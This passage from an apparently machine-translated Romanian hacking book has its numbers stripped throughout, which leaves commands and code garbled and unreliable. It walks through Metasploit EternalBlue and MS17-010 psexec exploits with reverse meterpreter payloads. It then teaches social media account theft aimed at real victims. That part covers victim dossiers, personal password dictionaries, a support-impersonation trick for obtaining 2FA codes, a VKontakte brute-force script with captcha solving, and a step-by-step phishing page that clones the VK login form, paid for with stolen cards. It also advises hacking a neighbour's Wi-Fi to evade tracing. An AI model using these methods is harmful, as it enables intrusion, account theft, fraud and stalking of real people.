punem totul împreună și să puneți în practică comenzile învățate Vom folosi exploit-ul EtemalBlue EtemalBlue este un exploit care a fost cel mai probabil dezvoltat de NSA ca o fostă vulnerabilitate zero-day Acesta a fost lansat în de grupul de hackeri Shadow Brokers, care este renumit pentru scurgeri de informații și exploatări de la Equation Group, despre care se spune că este strâns asociat cu departamentul TAO (Tailored Access Operations) al NSA Exploita-ul EtemalBlue, cunoscut și ca MS - , este o vulnerabilitate în protocolul Microsoft Server Message Block (SMB) SMB permite sistemelor să partajeze accesul la fișiere, imprimante și alte resurse dintr-o rețea Există o vulnerabilitate în versiunile ușor învechite de SMB care ar putea permite unui atacator să stabilească o conexiune de sesiune nulă prin autentificare anonimă Hackerul ar putea apoi să trimită pachete modificate și să execute comenzi arbitrare pe sistemul țintă În calitate de victimă, vom folosi un sistem de operare Windows Server R vechi și nepatchat Pentru a repeta isprava noastră, trebuie să descărcați același lucru Nu trebuie să vă gândiți că acesta este un sistem de operare foarte vechi - multe organizații îl folosesc încă chiar și în , deoarece o serie de crize nu vă permit să faceți upgrade hardware și să cumpărați software nou Și sistemul de operare în sine este încă (!) Disponibil pentru descărcare pe site-ul Microsoft: https://www microsoft com/en-us/download/details aspx id- Din acest link îl puteți descărca complet gratuit (versiunea de de zile) Așa că pornește Metasploit Acest lucru se poate face fie prin GUI, fie cu comanda msfconsole În continuare, vom încerca să găsim module potrivite Am scurtat rezultatul (este suficient de "larg" pentru a se potrivi pe o pagină de carte), așa că am păstrat doar numele modulelor: caută un albastru etern Module de potrivire Nume Data dezvăluirii Clasament Verificați descrierea auxiliar/admin/smb/msl conun și auxiliar/scanner/smb/smb msl exploit/windows/smb/msl eternălbiue exploit/windows/smb/msl - eternăl exploit/windows msl exploits/window msl eternălbiue Vis-a-vis de fiecare modul există o descriere, astfel încât veți înțelege pentru ce este folosit cutare sau cutare modul Vom folosi modulul exploit/windows/smb/msl eternalblue: utilizați exploit/windows/smb/msl - -eternalblue Vizualizați parametrii actuali ai modulului utilizând comanda opțiuni sau show options: Opțiuni de modul (exploit/windows/smb/msl eternalblue): Nume Setare curentă Descriere necesară RHOSTS - da Intervalul de adrese țintă sau identificatorul CIDR RPORT da Portul țintă (TCP) SMB Domain nu Domeniul Windows de utilizat pentru autentificare SMPass nu Parola pentru numele de utilizator specificat SMBUser no Numele de utilizator către autentifica ca VERIFY ARCH adevărat da Verificați dacă telecomanda se potrivește exploatați ținta VERIFICAȚI-ȚINTĂ pe care da Verificați dacă sistemul de operare la distanță se potrivește exploatați ținta exploatați ținta: Id Nume Windows și Server R (x ) Toate pachetele de servicii Setați variabila rhosts - adresa IP a țintei: msf > set rhosts rhosts => În continuare, vom folosi shell-ul tcp invers ca sarcină utilă: msf > setați sarcina utilă windows/x /meterpreter/reverse tcp payload => windows/x /meterpreter/reverse tcp Setați adresa IP a mașinii locale și portul de ascultare: msf > Ihost setați Ihost => msf > Import setați Import => Introduceți comanda run pentru a rula exploit: msf > alerga [*] A început gestionarea inversă TCP pe : [*] : - Se conectează la țintă pentru exploatare [+] : - Conexiune stabilită pentru exploatare [+] : - Sistemul de operare țintă selectat valid pentru sistemul de operare indicat de răspunsul SMB [*] : - CORE raw buffer dump ( de octeți) [*] : - x e f Windows Server [*] : - x e R Standard [*] : - x Service Pack [*] : - x b k [+] : - Arcul țintă selectat valabil pentru arcul indicat de răspunsul DCE/RPC [*] : - Încercarea de exploatare cu alocări de mire [*] : - Se trimite tot, cu excepția ultimului fragment al pachetului de exploatare [*] : - Începe îngrijirea piscinei fără paginare [ + ] : - Se trimite buffer-uri SMBv [+] : - Închiderea conexiunii SMBvl creând o gaură liberă adiacentă tamponului SMBv [*] : - Se trimite buffer-uri SMBv finale [*] : - Se trimite ultimul fragment al pachetului de exploatare! [*] : - Se primește răspuns de la pachetul de exploatare [+] : - Suprascrierea ETERNALBLUE a fost finalizată cu succes (OxCOOOOOOOD)! [*] : - Se trimite ou la conexiunea coruptă [*] : - Declanșare fără buffer corupt [*] Etapa de trimitere ( octeți) la [*]' Meterpreter sesiunea deschisă ( : -> : ) la - - : : - [ + ] : : [ + ] : - -WIN - = -= -ss -= -= -= -= -= -= [ + ) : - - metrupreter > Să ne dăm seama ce înseamnă totul Stabilim o conexiune SMB și trimitem un pachet de exploatare În cele din urmă, vedem WIN și meterpreter Senas se deschide Cu alte cuvinte, tocmai am spart un server Desigur, dacă serverul este corectat, nu va ieși nimic din el, dar de când am descărcat sistemul de referință R , unde această vulnerabilitate există cu siguranță Doar nu-l actualizați imediat după instalare Odată ce vedeți promptul meterpreter, puteți introduce orice comenzi și acestea vor fi executate pe sistemul de la distanță (piratat) De exemplu, putem introduce comanda sysinfo (cea mai inofensivă): sysinfo Computer: S OS: Windows R (Build , Service Pack ) Arhitectură: x Limba sistemului: ro US Domeniu: DLAB Utilizatori conectați: Meterpreter: x /windows Exploita-ul nu funcționează pe sisteme noi, dar în unele cazuri poate bloca un sistem de la distanță Nu poți pirata, dar măcar vei face un ecran albastru! Studiu de caz : Hacking sisteme moderne - Windows Server și Windows EtemalBlue a fost un succes, dar dacă sistemele vechi trebuiau patchizate, atunci în cele noi toate patch-urile ies din cutie și acest exploit nu funcționează Dezvoltatorii de exploit au fost foarte supărați de acest lucru și au dezvoltat trei exploit-uri similare - EtemalRomance și EntemalSynergy (vulnerabilitate CVE- - ) și EtemalChampion (CVE- - ) Toate au fost combinate într-un singur modul Metasploit care folosește și sarcina utilă clasică psexec Este considerat mai fiabil decât EtemalBlue, este mai puțin probabil să blocheze ținta și funcționează pe toate versiunile nepatchate ale Windows Server și Windows În primul rând, trebuie să găsim o victimă Dacă în trecut foloseam sisteme de operare evident vechi (pentru că nu aveam altele atât de vechi), acum vom încerca să găsim o victimă în rețeaua noastră locală folosind nmap În acest caz, vom rula nmap cu opțiunea - script și vom folosi scriptul smb-vuln-msl - Acest script va efectua o verificare a vulnerabilității În același timp, vom testa rețeaua noastră: nmap script smb-vuln-msl - -v / Acum trebuie să aveți răbdare în timp ce nmap scanează întreaga rețea Ieșirea scriptului, care indică faptul că a fost găsită o vulnerabilitate, arată astfel: Pornește Nmap ( https://nmap org ) la - - : MSK NSE: S-au încărcat scripturi pentru scanare NSE: Pre-scanare de script Inițierea NSE la : Scriptul rezultatelor gazdei: | smb-vuln-msl - : | VULNERABILE: | Vulnerabilitatea de execuție a codului de la distanță în serverele Microsoft SMBvl (ms! - ) Declar: VULNERABILE | ID-uri: CVE:CVE- - I Factorul de risc: MARE | Există o vulnerabilitate critică de execuție a codului la distanță în Microsoft SMBvl | servere (msl - ) eu | Data dezvăluirii: - - | Referinte: | https://cve mitre org/cgi-bin/cvename cgi?name=CVE- - Eu https://blogs technet microsoft com/msrc/ / / / ghid-client-pentru-wannacrypt-atacuri/ | https://technet microsoft com/en-us/library/security/msl - aspx NSE: Script Post-scanare Inițierea NSE la : NSE finalizat la : , au trecut O OO Citiți fișierele de date de la: /usr/bin/ /share/nmap Deci victima a fost găsită În cazul nostru, acesta este Windows Server Datacenter Ediție, adresa IP Acum trebuie să porniți consola și să găsiți modulul potrivit: msfconsole caută romantism etern Module de potrivire Nume Data dezvăluirii Clasament Verificați descrierea auxiliar/admin/smb/msl command - - normal Da MS - EternalRomance/EternalSynergy/EternalChampion SMB Execuția comenzii Windows la distanță exploit/windows/smb/msl psexec - - normal Nu MS - EternalRomance/EternalSynergy/EternalChampion SMB Execuție de la distanță a codului Windows Cadrul a găsit două module Vom folosi exploit/windows/smb/ms psexec: utilizați exploit/windows/smb/ms psexec Să ne uităm la opțiunile modulului: Opțiuni Este imposibil să se potrivească toți parametrii de pe pagina cărții, așa că oferim o captură de ecran Orez Parametrii modulului exploit/windows/smb/msl psexec Ca și în cazul precedent, trebuie să setăm gazda la distanță, sarcina utilă, mașina locală și portul local: msf > set rhosts rhosts => msf > setați sarcina utilă windows/x /meterpreter/reverse tcp sarcină utilă => windows/x /meterpreter/reverse tcp msf > setează Ihost Ihost => msf > setați Iport Iport => Totul este gata de lansare Lansăm: [*] A început gestionarea inversă TCP pe : [*] : - Sistem de operare țintă: Windows Server Standard Evaluation eu J [*] : primitiv [+] : obținut! - Am construit un scrie-ce-unde - Suprascrie completă sesiune SISTEM [*] : - Se selectează ținta PowerShell [*] : - Se execută sarcina utilă [+] : - Pornirea serviciului a expirat, OK dacă rulează o comandă sau un executabil non-serviciu [*] Etapa de trimitere ( octeți) la [*] Meterpreter sesiunea deschisă ( : -> : ) la - - : : - Deci, sesiunea meterpreter a fost stabilită cu succes și putem introduce comenzi care vor fi rulate pe sistemul piratat: sysinfo Arhitectura sistemului de operare Sistem Limba Domeniu Conectat Utilizatori Meterpreter : DC : Windows (Build ) : x : enJJS : DLAB : : x /windows În special, dacă introducem getuid pentru a obține UID-ul utilizatorului, putem vedea că rulăm ca sistem: Nume utilizator server: NT AUTHORITY\SYSTEM După cum tocmai am arătat, este relativ ușor să piratați o versiune modernă de Windows Server dacă nu este corectată la timp Dacă sunteți administrator de sistem, tocmai am demonstrat de ce trebuie să instalați corecții de securitate și actualizări Amenințarea pe care am demonstrat-o este încă relevantă, deoarece nu toți administratorii sunt sârguincioși în sarcinile lor Ca urmare, avem o gaură uriașă de securitate prin care nu numai datele pot scăpa (scurge), ci și întregul sistem poate avea de suferit Capitolul Hacking și protejarea conturilor de social media În acest capitol, vom vorbi despre o altă problemă interesantă - hacking-ul paginilor de pe rețelele sociale Vă vom spune cum să piratați și cum să vă protejați de hacking Cine pirata conturile și de ce Există diverse motive pentru a pirata conturile de social media În funcție de motivul hacking-ului, există de fapt hacking (când un hacker obține acces la contul victimei) și așa-numita "deturpare" a contului, atunci când hacker-ul schimbă parola, leagă un alt telefon, astfel încât victima să nu poată conectați-vă mai mult la cont Deci, să evidențiem principalele motive: • Hacking de dragul hackingului - este solicitat printre hackerii începători Ei doar exersează Pentru ei, hack-ul în sine este important și nu dorința de a răsfăța pe cineva Desigur, nu există nici hackeri foarte buni care pirata mai întâi pagina și apoi postează diverse lucruri urâte pe ea Iată, cât de norocoasă sau de ghinionoasă este victima Un astfel de hacking poate fi cu sau fără furt Este dificil să prezici un începător care se sparge mai întâi și apoi se gândește ce să facă cu toate acestea Deoarece nu există niciun scop, după hacking, orice pagină se poate întâmpla - din dorința sau starea de spirit a hackerului • Cauze casnice - gelozie, dorinta de a controla persoana iubita sau copilul De regulă, astfel de hack-uri nu sunt însoțite de deturnarea paginii Nimeni nu schimbă parola, pentru că este important ca victima să nu bănuiască nimic și să continue să folosească contul Hackerul este interesat de cine comunică, ce mesaje scrie etc Cred că totul este clar aici • Spam - un hacker intră într-o pagină și apoi postează reclame din aceasta în feed De regulă, un astfel de hacking este însoțit de deturnare - este important pentru el ca reclama să rămână cât mai mult timp posibil până când este eliminată Tot la el este important ca cât mai mulți utilizatori să vadă reclame, așa că doar conturile populare care au mulți prieteni și urmăritori sunt piratate în astfel de scopuri Hackerul poate depista victima - el poate fi unul dintre abonații ei Este important pentru el să știe când victima va lipsi cel puțin câteva zile Perioada ideală este atunci când victima pleacă în vacanță Nu-ți vine să crezi câți oameni postează vacanțe pe rețelele sociale! Cel puțin victima va fi pe drum - zile și nu va avea timp de internet Iar unii în general închid telefonul în vacanță ca să nu-i deranjeze nimeni În consecință, victima va lipsi deloc o săptămână Desigur, utilizatorul va contacta serviciul de asistență, va raporta un hack, va furniza documente care confirmă faptul că deține un cont, adrese IP de la care se autentifica de obicei, număr de telefon etc Contul îi va fi returnat, dar cu cât acest lucru se întâmplă mai târziu, cu atât mai bine Prin urmare, hackerul va schimba nu numai parola, ci și numărul de telefon Dacă acest lucru s-a întâmplat cu pagina dvs , nu intrați în panică, ci contactați asistența De asemenea, nu încercați să contactați alt cont cu hackerul Va cere bani pentru a returna contul, dar nu si faptul ca dupa plata va returna contul inapoi Cel mai probabil nu Iar serviciul de asistență al rețelei sociale ți-l va returna complet gratuit Hackingul de răscumpărare a contului este un alt motiv popular pentru hacking Contul victimei este deturnat, iar apoi pe telefonul ei ii vine un SMS, care spune că pentru returnarea contului, plătiți cutare și cutare sumă Uneori, SMS-urile pot fi deghizate ca rețeaua socială în sine Imaginează-ți că primești un SMS de la Facebook, care spune că pentru acțiuni ilegale cu contul a fost blocat și trebuie să plătești o amendă de de ruble pentru deblocare Dacă contul dvs este blocat de o rețea socială, atunci nu îl va mai debloca pentru niciun ban % dintre aceștia sunt escroci, așa că trebuie să contactați canalele oficiale (și nu cele menționate în scrisoare) cu serviciul de asistență al rețelei de socializare Hacking în scopul vânzării - probabil ați observat anunțuri frecvente despre închirierea conturilor Agenții de publicitate vă închiriază contul și își efectuează manipulările în numele dvs - puneți aprecieri pentru postările plătite, abonați-vă la pagini etc Hackerii vă pot sparge și vinde contul agenților de publicitate Până când restabiliți accesul, veți fi deja abonat la mii de tot felul de pagini Din această cauză, unii utilizatori își creează conturi noi pentru a nu se dezabona de la toate acestea și pentru a nu elimina toate like-urile pe care le-au pus jos, deoarece acest lucru va ucide mult timp Hacked, atât popular, cât și nu G foarte conturi Doar un cont este important aici, iar numărul de prieteni este secundar • Concurență sau spionaj industrial - uneori trebuie să piratați contul de afaceri al unui concurent pentru a obține informațiile necesare, de exemplu, setările campaniei de publicitate, corespondența clienților etc În unele cazuri, un cont de afaceri este chiar mai ușor de piratat Amintiți-vă că este rar ca un singur proprietar să folosească un cont de afaceri, adesea el dă acces la acesta angajaților săi Și când, să zicem, - persoane au acces, atunci oportunitățile tale se extind Nu a funcționat să piratați un cont, puteți încerca să piratați altul Prostia sau prostia umană nu cunoaște limite Recent, unul dintre autorii acestei cărți a fost desemnat să verifice securitatea uneia dintre întreprinderi, inclusiv verificarea contului de afaceri de pe Facebook Cinci persoane au avut acces la cont, inclusiv fata Zlata Parola pentru contul personal al lui Zlata era аІа , iar numărul de telefon era disponibil public pe pagina lui Zlata O perdea Colectarea de informații Există diferite metode de hacking În general, piratarea unei rețele de socializare nu este un lucru rapid Doar pisicile nasc repede și conturile sunt sparte de hackeri în filme Trebuie să ai răbdare pentru a termina ceea ce ai început Nu există o metodă universală pentru a pirata un cont Înainte de a începe hacking-ul, trebuie să aduni cât mai multe informații despre victima ta Cu cât colectați mai multe informații, cu atât va fi mai ușor să spargeți parola Colectați tot felul de informații și păstrați un dosar: • Numele complet • Data și locul nașterii • Locul de reședință • Statut social • Locul de muncă și poziția • E-mail, număr de telefon • Nume de fată pentru femei • Mâncăruri preferate, numele animalelor de companie, dacă există • Florile preferate, hobby-uri, hobby-uri etc De asemenea, este o idee bună să vă împrietenești cu unii dintre prietenii victimei și apoi să o împrietenești cu victima însăși Acest lucru nu va trezi suspiciuni (victima va vedea că ești un prieten comun, poate te-a văzut undeva (desigur, nu tu, ci acea fotografie falsă pe care ai pus-o într-un cont fals) și nu va dori să refuze fi adăugat prietenilor, mai ales că există cunoștințe comune) Ca urmare, veți avea acces la informații care sunt deschise doar prietenilor - câteva fotografii care vă pot ajuta să înțelegeți unde se află victima; număr de telefon; e-mail, etc Veți avea nevoie de un număr de telefon și de e-mail pentru a trimite mesaje false presupus de la o rețea socială Dacă nu sunt pe pagina de socializare, va trebui să le calculezi Colectați cât mai multe conturi pe care victima le folosește - Facebook, VK, Instagram, Twitter etc Rând pe rând, încercați să recuperați parola în fiecare dintre aceste conturi Când recuperați o parolă, un mesaj poate fi trimis fie către e-mail, fie către un telefon, dacă este conectat la un cont Fiecare dintre aceste servicii acoperă partea sa din număr cu asteriscuri De exemplu, încercați să recuperați parola pe VK - veți primi o parte din numărul de telefon Apoi, dacă victima are e-mail pe Mail Ru, încercați să restabiliți accesul la e-mail - veți primi a doua parte a numărului Dacă lipsesc câteva personaje, nicio problemă, puteți sorta, atunci există doar opțiuni pentru fiecare personaj-loc Desigur, dacă lipsesc două numere, atunci există deja de opțiuni Poșta poate fi calculată în codul paginii De exemplu, dacă victima folosește rețeaua de socializare My World, atunci e-mailul ei se află în codul paginii de profil sau chiar în adresa URL Puteți folosi ingineria socială - cunoașteți victima, comunicați câteva zile pentru a nu trezi suspiciuni, apoi cereți un e-mail pentru a trimite informații presupus de interes pentru victimă Voila - există mail Adevărat, victima poate folosi diferite cutii poștale pentru rețeaua socială și corespondența personală - acest lucru va complica sarcina În mod similar, totuși, puteți obține un număr de telefon Aflați și toate poreclele animalelor - care au fost și care sunt Foarte des, numele animalului face parte din parolă sau din parola în sine Același lucru se poate spune despre copii Dacă victima are copii, aflați numele acestora De foarte multe ori parola este numele copilului Mai mult, dacă există o fată și un băiat, atunci, cel mai probabil, numele fetei va fi parola (eventual cu unele numere, de exemplu, anul sau data nașterii, de exemplu, Vika ) Hobby-urile sau hobby-urile sunt un alt punct slab De exemplu, dacă victima este un fan Audi, atunci parola poate fi cuvântul Audi cu câteva numere, de exemplu: • AudiQ - marca și modelul mașinii • Audi - marca si codul piesei • Audi - marca și numărul mașinii Da, de asemenea, este de dorit să cunoașteți numărul mașinii - poate face parte din parolă Numărul, de regulă, este ușor de recunoscut din fotografiile pe care victima le postează pe rețeaua de socializare Din toate aceste date, asamblați un dicționar de parole posibile Numele victimei să fie Andrei Ivanov, victima s-a născut pe , are un cont Facebook /iandreyl , iubește mașini, în special Audi, deține o mașină cu numărul regiunea (numărul este fictiv) , mai are o fiică, Victoria, care s-a născut pe octombrie Numărul de telefon al victimei este (numărul este fictiv) Să colectăm o listă de parole posibile (acestea nu sunt toate parolele care pot fi colectate pe baza acestor date, doar ca să înțelegeți cum să formați un astfel de dicționar): // Block Hobby Audi AudiQ AudiQ Audi Audi Audi AudiQ Audi Audil audi audiq audiq audi audi audi audiq audi audil // Blocați datele personale Andrey andrey Andreyl Andreyl ivanovl ivanovl // Copii și animale Vika vika Vika vika Vika vika // Alte conturi iandreyl iandreyl iandreyl // Diverse prostii ca: qwerty qwertyl O astfel de listă ar trebui să conțină cel puțin de opțiuni de parole diferite Cel mai probabil, vor exista mai multe astfel de opțiuni dacă colectați toate informațiile necesare Apoi puteți încerca fie să introduceți aceste parole manual, fie să automatizați acest proces Forțarea brută (adică ridicarea parolelor prin rearanjarea caracterelor) nu are prea mult sens, deoarece după un anumit număr de încercări contul este blocat pentru o perioadă, așa că forțarea brută poate dura o veșnicie și nu un fapt care va duce la parola corectă Să ne imaginăm că victima avea o parolă aleatorie VM A Până când programul ajunge la această combinație de caractere, poate dura câteva luni, ținând cont de blocări Desigur, rețeaua de socializare va avertiza că încearcă să spargă parola Victima îl va schimba în Aa Q Programul a folosit deja o astfel de parolă în urmă cu o lună și nu s-a potrivit Prin urmare, la forțarea brută, există șansa de a nu obține deloc o parolă Iar dicționarele bazate pe informații personale vă permit să atingeți ținta exact și să reduceți timpul de acces de la câteva zile la câteva ore Lasă o rețea socială după încercări greșite să blocheze contul timp de o oră Prin urmare, puteți introduce doar parole într-o oră Sunt pe lista ta G parolele Timp de hacking - de ore După de ore, fie veți avea acces la contul dvs , fie ați creat un dicționar de parole incorect Atenție! Autorizare cu doi factori Autentificarea cu doi factori a devenit o caracteristică a ultimelor zile Când rețeaua de socializare vede că un utilizator încearcă să se autentifice de pe alt dispozitiv, trimite un cod către numărul său de telefon într-un SMS Aici este important să vă aprovizionați cu numărul victimei Dacă se întâmplă acest lucru, ar trebui să trimiteți imediat un mesaj victimei "Pentru a preveni accesul nedorit la cont, trimiteți codul primit de la SMS-ul anterior" sau ceva de genul Victima din parc poate merge înainte și trimite codul pe care i-a trimis rețeaua de socializare pentru a-și intra în cont! Desigur, victima poate ghici și nu trimite nimic - acest lucru se poate întâmpla și va trebui să căutați alte metode de hacking De asemenea, trebuie remarcat faptul că nu toți utilizatorii permit autentificarea cu doi factori - mulți nici măcar nu înțeleg ce este! Metode de hacking Hacking e-mail În capitolul , am prezentat metode de spargere a unui cont de e-mail Dacă le-ați stăpânit cu succes, le puteți folosi pentru a obține acces la căsuța poștală electronică a utilizatorului Odată ce ați intrat în posesia căsuței poștale, puteți "recupera" parola contului, rețelei de socializare În general, o chestiune de tehnologie Dezavantajul acestei metode este că victima va ști că parola pentru pagină a fost schimbată Dar din nou, totul depinde de scopul hack-ului, dacă acesta nu este un hack de uz casnic, atunci când trebuie să salvați parola, atunci nu ar trebui să vă pese Inginerie sociala Tehnicile de inginerie socială pot fi, de asemenea, utile Adevărat, în ultimii ani nu sunt atât de eficiente ca înainte, deoarece oamenii au devenit mai educați în domeniul IT și mai puțin creduli Cu toate acestea, această metodă poate funcționa Funcționează bine mai ales cu începătorii - fie cu copii, fie cu bătrâni Creați un fel de cont fals sau, mai bine, sunați (anonim, prin SIP) și prezentați-vă ca reprezentant de asistență În continuare, trebuie să aflați de la victimă toate informațiile de care aveți nevoie Poate sa acționați cu siguranță și spuneți că pagina dvs este piratată Sunați, prezentați-vă ca specialist în asistență tehnică VKontakte Roman (bine, sau orice alt nume pe care îl preferați), specificați numele dvs complet (este în chestionar, la fel de des ca un număr de telefon) și raportați că încearcă să vă pirateze pagină Între timp, chiar tu încerci să intri pe pagina utilizatorului, sau mai degrabă să-i recuperezi parola Informați victima că acum va fi trimis un SMS la numărul său de telefon și trebuie să dictați un cod pentru ca suportul tehnic să se asigure că utilizatorul este exact el și să întrerupă toate încercările hackerilor de a pirata contul Victima raportează codul, apoi este o chestiune de tehnologie Principalul lucru este că suni înainte de a veni codul Prin urmare, mai întâi sunăm, stabilim contactul și apoi inițiam recuperarea parolei Cu unii utilizatori, acest lucru va funcționa cu ușurință și veți petrece - minute pentru tot Acest lucru poate accelera semnificativ hacking-ul în comparație cu alte metode, unde este nevoie de săptămâni pentru a "încărca" contul victimei Parola Brute Force După cum s-a menționat mai devreme, nu are sens să folosești diverse utilități pentru forța brută (bruteforce) cu rețelele sociale, având în vedere blocarea unui cont după un anumit număr de încercări de parole incorecte Cel mai bine este să folosiți dicționare de puncte bazate pe date personale Parolele pot fi introduse manual - nu sunt multe dintre ele - sau procesul poate fi automatizat Puteți găsi tot felul de scripturi pentru aceasta pe Internet Iată un exemplu (foaia ) de script scris în Python Scriptul automatizează forța brută a parolei prin versiunea mobilă a VKontakte Lista Forța brută a parolei prin versiunea mobilă a VKontakte #! codificare: utf import grab, re, urllib din antigate import AntiGate din grab import GrabTimeoutError din timpul importului cap key = ' ' #Cheia dvs cu Antigate def anti (cheie, fișier) : #Obținerea unei soluții Captcha cu Antigate încerca: încerca: date = AntiGate(cheie, fișier) [ date returnate exceptând KeyboardInterrupt: prinț("End"), except: anti(cheie, fișier) def save(url, file): #Descărcați fișierul fără URL site • urllib urlopen(uri) f = deschis(fișier, 'wb') f write(site read()) def cap solve(img): salvare(img, 'captcha jpg') cheie = anti(cap key, 'captcha jpg') cheia return def brute(autentificare, parole, salvare): out = deschis(salvare, 'w') psswrds = deschis(parole, 'r') încerca: int (autentificare) prefix=Adevărat cu exceptia: prefix-fals g = apuca GrabO g go('http://rn vk com') pentru linia în psswrds: psswrd = line rstrip('\r\n') g doc set input('e-mail', autentificare) g doc set input('pass', psswrd) g doc submit() dacă g doc text search(u'captcha'): all captchas - re findall ("" (/captcha php[L"] *) , g response body)[ ] captcha = '' + all captchas cheie = cap solve(captcha) g doc set input('e-mail', autentificare) g doc set input('pass', psswrd) g doc set input('captcha key', str(key)) g doc submit () prinț("cap") if 'Submit' in g response body: dacă prefix: prefixl = g doc rex search('\+[ - ]*') grup( ) prefix = g doc rex search('[ - ]*') grup( ) prel = re findall ( ' [ - ] { , } , prefixl) [ ] pre = re findall (' [ - ] ( , } , prefix ) [ ] login = autentificare înlocuiți(prel, '') login = login replace(pre , w) g set input('cod', autentificare) g submit() prinț(login + + psswrd + '-succes') out write(login + psswrd + '\n') altceva: out write(login + ':' + psswrd + '\n') altfel: if g doc rex search('[l>]+')-group( ) == 'Autentificare | VK': prinț(login + ':' + psswrd + ' fail') else: prinț(login + + psswrd + '-succes') out write(login + ':' + psswrd + '\n') out close() psswrds close() Da, acest script este departe de a fi ideal, dar îl puteți modifica dacă doriți Partea bună este că va intra în captcha în sine folosind Antigate, iar captcha va apărea pentru că vă conectați din altă țară Notă Sper că te-ai gândit să folosești toate măsurile de precauție? Utilizați pașii din Capitolul pentru a vă asigura anonimatul Cel puțin, nu piratați conturi de pe internetul dvs de acasă, cumpărați o cartelă SIM și schimbați-vă locația Utilizați VPN sau Tor Dacă nu puteți cumpăra un card, piratați Wi-Fi-ul cuiva - aceasta este o șansă bună de a trece neobservat Dar nu uitați să luați măsuri de precauție Dacă nu doriți să utilizați un VPN (sau o rețea socială blochează accesul de la VPN/Tor), piratați Wi-Fi-ul cuiva (numai al vecinului, ci de preferință într-o altă casă) și folosiți rețeaua virtuală de pe computer pentru a lucra o mașină nouă pe care o veți șterge imediat ce obiectivul este atins Pentru ca pe computerul tău să nu rămână date care ar putea dovedi că tu ai fost cel care a piratat Și apoi Autopsia este un instrument destul de puternic și poate să afle mai multe informații despre tine decât știi despre tine! Această metodă vă permite să intrați în pagină fără a schimba parola, adică este potrivită dacă aveți nevoie ca victima să nu ghicească că pagina a fost piratată Phishing sau pagină falsă Ghid foarte detaliat Phishingul este probabil cea mai comună metodă de a pirata paginile de social media De exemplu, un hacker poate crea pur și simplu o pagină care este identică ca structură și design, pe care site-ul solicită login-ul și parola victimei Când victima îl introduce, datele de conectare și parola sunt trimise hackerului Notă Pescuitul vine din pește - pește La rândul său, această metodă implică "agățarea" Dacă victima este prinsă sau nu depinde de experiența pescarului și de ingeniozitatea peștelui Deși chiar și acum mulți utilizatori sunt deja destul de alfabetizați și pot distinge adresa unui site de phishing de una reală, nu uitați că există noi veniți care, după ce au văzut un design similar, încep să aibă încredere orbește în site Cum se implementează: Înregistrați un domeniu precum vk-login com, facebook-login com, fb-login celulă sau ceva care arată ca o adresă de rețea socială Înregistrarea trebuie făcută pe un e-mail fals, plătit cu bitcoins sau cu un card de credit furat Cumpărați o găzduire ieftină, nu în Rusia, atașați un domeniu la această găzduire Cumpărați cel mai ieftin certificat SSL pentru ca browserul să nu înjure pe absența lui Deci nu vei reuși chiar de la început! Găzduirea trebuie să fie activată pentru PHP - aceasta este o condiție prealabilă Folosind comanda Salvare ca din browser, salvați pagina de conectare la rețeaua socială împreună cu imaginile Editați codul HTML astfel încât numele de utilizator și parola introduse rol v-au fost trimise prin e-mail, scriptul va fi dat Dacă doriți, puteți redirecționa către o rețea de socializare, astfel încât victima nu bănuia nimic Deoarece victima este cel mai probabil deja conectată la rețeaua socială, va fi suficient să redirecționați către pagina principală - victima nu va înțelege nimic și nu va trebui să introducă parola de două ori Rămâne doar să atragem victima către o pagină falsă Poate fi trimis trimite-i un mesaj despre necesitatea actualizării datelor personale, vizualizarea unor conținuturi interesante etc În general, arată-ți imaginația Toată munca tehnică făcută până acum depinde de cât de mult te străduiești la ultimul pas Facebook, de exemplu, trimite în mod regulat spam la căsuța poștală - se spune că uite cine ți-a vizualizat pagina, cine a lăsat o părere despre pagina ta, trimite diverse memento-uri de ziua ta etc Dacă utilizați această rețea, probabil că ați văzut mesaje similare Trimiteți utilizatorului același mesaj, cu același design În astfel de mesaje, de regulă, există un buton cu un link, de exemplu, linkul duce la messenger să ureze utilizatorului la mulți ani Schimbați linkul care va duce la domeniul dvs fals fb-login com Victima îl urmărește și vede fereastra de conectare la rețeaua socială Dacă victima trece de la un telefon mobil, este posibil să nu bănuiască nimic Acum să vorbim despre partea tehnică folosind exemplul VKontakte (la urma urmei, acesta una dintre cele mai populare, dacă nu chiar cea mai populară rețea din spațiile noastre deschise) Pe fig Figura prezintă pagina de conectare la rețeaua socială Faceți clic dreapta și selectați Salvare ca Salvați pagina ca index html, selectați Pagina (Complet) când salvați, așa cum se arată în fig Orez Pagina de conectare în VKontakte G Pic Salvarea unei pagini pe VKontakte Trebuie să salvați pagina într-un director separat special creat în acest scop (o avem C:\vk) Pe fig Figura arată conținutul acestui director după salvarea paginii Totul este destul de concis Orez Pagina salvată Publicați conținutul directorului C:\vk pe găzduirea dvs Trebuie să copiați conținutul, nu întregul director - fișierul index html și folderul index files Încercați să vă deschideți site-ul Veți vedea așa ceva (Fig ) În loc de simboluri rusești - un fel de abracadabra Evident, nu pagina la care poți atrage utilizatorul Dar atenție - este în design Deci, să trecem la a doua etapă Pic Abracadabra Veți avea nevoie de editor de text Notepad (disponibil gratuit la https://www flos-freeware ch/) Deschideți index html în acest editor și alegeți Fișier, Codificare, UTF- Apoi schimbați codificarea ferestrei- în utf- , editarea necesară este evidențiată în fig Orez Editarea index html Salvați fișierul și încărcați-l din nou prin FTP pe site-ul dvs Redeschideți pagina Acum totul este în regulă cu codificarea (Fig ) Daca esti foarte atent, probabil ai observat ca lipseste imaginea smartphone-ului Dar numai tu știi despre asta și nu toți utilizatorii știu cum ar trebui să arate pagina de conectare Dacă doriți, puteți face o captură de ecran a paginii și lipiți captura de ecran rezultată în loc de obiectul smartphone-ului Pentru a face acest lucru, veți avea nevoie de cunoștințe de HTML și de a lucra în editorul de grafică Paint În general, elementele de bază ale elementelor de bază Nu vom face asta, pentru că credem că pagina se va potrivi oricum Lun Pic Fără probleme de codare Reveniți din nou la editorul de text Acum avem o sarcină mai importantă Trebuie să găsiți formularul de autentificare și să îl modificați astfel încât să nu transmită date către VKontakte, ci către script-ul dvs , care îl va primi și vi-l va trimite prin e-mail Formularul nostru de conectare este evidențiat în Fig Lista sa exactă este dată în fișă Lista Formular de autentificare VKontakte cinput type="hidden" name="act" value="login"> cinput type="hidden" name="role" value="al frame"> Cinput type="hidden" name="expire" id="quick expire input" value=""> Cinput type="hidden" name="to" id="quick login to" value="aW kZXgucGhw"> Cinput type="hidden" name="recaptcha" id="quick recaptcha" value=""> Cinput type="hidden" name="captcha sid" id="quick captcha sid" value=""> Cinput type="hidden" name="captcha key" id="quick captcha key" value=""> cinput type="hidden" name=" origin" value="https://vk com"> 